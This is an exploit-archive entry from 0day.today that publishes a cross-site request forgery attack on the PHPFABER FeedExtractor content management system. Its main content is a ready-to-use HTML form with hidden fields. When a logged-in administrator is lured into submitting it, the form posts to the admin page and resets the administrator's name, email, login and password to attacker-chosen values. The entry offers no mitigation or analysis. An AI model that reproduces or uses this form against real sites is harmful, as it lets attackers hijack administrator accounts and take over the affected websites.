PHPFABER FeedExtractor CSRF Vulnerability

2012-04-02T00:00:00
ID 1337DAY-ID-17919
Type zdt
Reporter Jonturk75
Modified 2012-04-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: PHPFABER FeedExtractor CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/phpfaber-feedextractor-automatic-rss-to-html/27563/
# Category::  webapps
# Demo : http://demo.phpfaber.com/cms1/cms_admin/




<form name="frm" method="post" action="/cms1/cms_admin/index.php?page=adm">
<input name="name" value="Administrator" size="30" type="hidden">
<input name="email" value="[email protected]" size="30" type="hidden">
<input name="login" value="admin" size="30" type="hidden">
<input name="pwd" value="newpassword" size="30" type="hidden">
<input name="pwd2" value="retry newpassword" size="30" type="hidden">
<input name="go" value="Update" type="submit"></td>
</form>



#  0day.today [2018-04-08]  #